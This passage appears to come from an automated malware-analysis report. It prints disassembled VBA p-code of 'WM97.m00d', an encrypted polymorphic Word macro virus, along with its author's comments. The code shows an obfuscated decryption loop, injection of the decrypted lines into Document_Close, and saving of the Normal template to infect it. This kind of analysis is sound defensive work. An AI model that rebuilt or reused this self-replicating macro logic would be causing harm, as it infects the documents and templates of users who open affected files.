' Ld ź¤¦‘š‰ŽĆ
' LitDI2 0x0001
' Ld ��´ŁśŤ¶Ć©�
' ArgsMemLd lines 0x0002
' LitDI2 0x0002
' Ld ź¤¦‘š‰ŽĆ
' LitDI2 0x0001
' Ld ��´ŁśŤ¶Ć©�
' ArgsMemLd lines 0x0002
' FnLen
' ArgsLd Mid$ 0x0003
' St ˘–Â
' Line #124:
' StartForVariable
' Ld –ł”�„™Ľ—“
' EndForVariable
' LitDI2 0x0001
' Ld ˘–Â
' FnLen
' For
' Line #125:
' Ld ˘–Â
' Ld –ł”�„™Ľ—“
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' ArgsLd Asc 0x0001
' LitDI2 0x0002
' LitDI2 0x0001
' Ld ��´ŁśŤ¶Ć©�
' ArgsMemLd lines 0x0002
' LitDI2 0x0002
' LitDI2 0x0001
' Ld ��´ŁśŤ¶Ć©�
' ArgsMemLd lines 0x0002
' FnLen
' LitDI2 0x0001
' Sub
' ArgsLd Right 0x0002
' Paren
' Sub
' LitDI2 0x0004
' Ld ˘–Â
' FnLen
' Mul
' LitDI2 0x0002
' Ld –ł”�„™Ľ—“
' Mul
' Add
' Paren
' Paren
' LitR8 0xCCCD 0xCCCC 0x4CCC 0x4032
' Div
' FnInt
' Paren
' Sub
' ArgsLd Chr 0x0001
' St ”›…Ą‘Á
' Line #126:
' Ld ĆšŞ‡° ÉŠĆ
' Ld ”›…Ą‘Á
' Concat
' St ĆšŞ‡° ÉŠĆ
' Line #127:
' StartForVariable
' Ld –ł”�„™Ľ—“
' EndForVariable
' NextVar
' Line #128:
' Ld ›ŤĄ’Ë‹„›
' Ld ĆšŞ‡° ÉŠĆ
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' St ›ŤĄ’Ë‹„›
' BoS 0x0000
' LitStr 0x0000 ""
' St ĆšŞ‡° ÉŠĆ
' Line #129:
' StartForVariable
' Ld ź¤¦‘š‰ŽĆ
' EndForVariable
' NextVar
' Line #130:
' StartForVariable
' Ld Ć© Ŕżł·
' EndForVariable
' LitDI2 0x0001
' Ld ��´ŁśŤ¶Ć©�
' MemLd countoflines
' For
' Line #131:
' Ld Ć© Ŕżł·
' LitDI2 0x0001
' Ld ��´ŁśŤ¶Ć©�
' ArgsMemLd lines 0x0002
' LitStr 0x001C "Private Sub Document_Close()"
' Eq
' IfBlock
' Line #132:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #133:
' Ld Ć© Ŕżł·
' LitDI2 0x0001
' Add
' Ld ›ŤĄ’Ë‹„›
' Ld ��´ŁśŤ¶Ć©�
' ArgsMemCall insertlines 0x0002
' Line #134:
' ExitFor
' Line #135:
' EndIfBlock
' Line #136:
' StartForVariable
' Ld Ć© Ŕżł·
' EndForVariable
' NextVar
' Line #137:
' ArgsCall (Call) Document_Close 0x0000
' Line #138:
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' Line #139:
' Ld ActiveDocument
' MemLd FullName
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0001
' Line #140:
' EndSub
' Line #141:
' FuncDefn (Private Sub Document_Close())
' Line #142:
' EndSub
' Line #143:
' Line #144:
' QuoteRem 0x0000 0x0055 "<-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=->"
' Line #145:
' Line #146:
' QuoteRem 0x0000 0x0012 "MyName = WM97.m00d"
' Line #147:
' QuoteRem 0x0000 0x0022 "WrittenBy = f0re [UC/Skamerks/DVC]"
' Line #148:
' QuoteRem 0x0000 0x0000 ""
' Line #149:
' QuoteRem 0x0000 0x0047 "This is my first attempt to write an encrypted polymorphic macro virus."
' Line #150:
' QuoteRem 0x0000 0x0050 "I havent included any payload. Stealth is also left out (see my other macros for"
' Line #151:
' QuoteRem 0x0000 0x0056 "good stealth techniques). Although this virus is a bit slow, it works fine. I did have"
' Line #152:
' QuoteRem 0x0000 0x005A "some problems with the randomly generated key. Though you can check this out for yourself."
' Line #153:
' QuoteRem 0x0000 0x003B "If you find any other errors please let me know. Have phun."
' Line #154:
' Line #155:
' QuoteRem 0x0000 0x0055 "<-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=->"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.